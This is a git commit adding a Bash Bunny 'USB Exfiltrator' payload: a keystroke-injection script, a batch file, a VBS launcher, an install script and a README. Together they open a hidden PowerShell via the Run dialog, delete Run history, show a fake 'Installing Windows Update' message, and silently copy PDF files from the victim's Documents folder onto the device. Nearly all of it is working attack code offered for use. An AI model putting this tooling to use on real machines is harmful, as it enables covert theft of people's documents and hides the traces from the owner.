USB Exfiltrator

pull/2/head
Darren Kitchen 2017-03-02 18:59:15 -08:00 committed by GitHub
parent d476084ef7
commit dcace71e99
6 changed files with 84 additions and 0 deletions

View File

@ -0,0 +1,4 @@
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
cscript %~d0\i.vbs %~d0\e.cmd
@exit

View File

@ -0,0 +1,29 @@
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
)
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit

View File

@ -0,0 +1 @@
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

View File

@ -0,0 +1,8 @@
LED R G
PAYLOADDIR=$(find /root/udisk/payloads/ -name d.cmd -printf '%h\n')
cd $PAYLOADDIR
mv d.cmd e.cmd i.vbs /root/udisk/
sync
LED R G B 30
sleep 2
exit 0

View File

@ -0,0 +1,19 @@
#!/bin/bash
#
# Title: USB Exfiltration
# Author: Hak5Darren
# Version: 1.0
# Target: Windows XP SP3+
# Props: Diggster
#
# Executes d.cmd from the root of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies documents to the loot folder on the Bash Bunny.
#
LED R
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'d.cmd')"
QUACK ENTER
LED G

View File

@ -0,0 +1,23 @@
# Exfiltrator for Bash Bunnys
* Author: Hak5Darren
* Version: Version 1.0
* Target: Windows
## Description
Exfiltrates files from the users Documents folder
Saves to the loot folder on the Bash Bunny USB Mass Storage partition named by the victim hostname, date and timestamp.
## Configuration
By default the staged payload exfiltrates PDF files. Change the xcopy commands from e.cmd to your liking.
## STATUS
| LED | Status |
| --------==-------- | -------------------------------------------- |
| Amber | Installing e.cmd d.cmd and i.vbs to USB Disk |
| White (blinking) | Setup Failed. Target didn't obtain IP |
| Red | Attack Setup |
| Green | Attack Complete |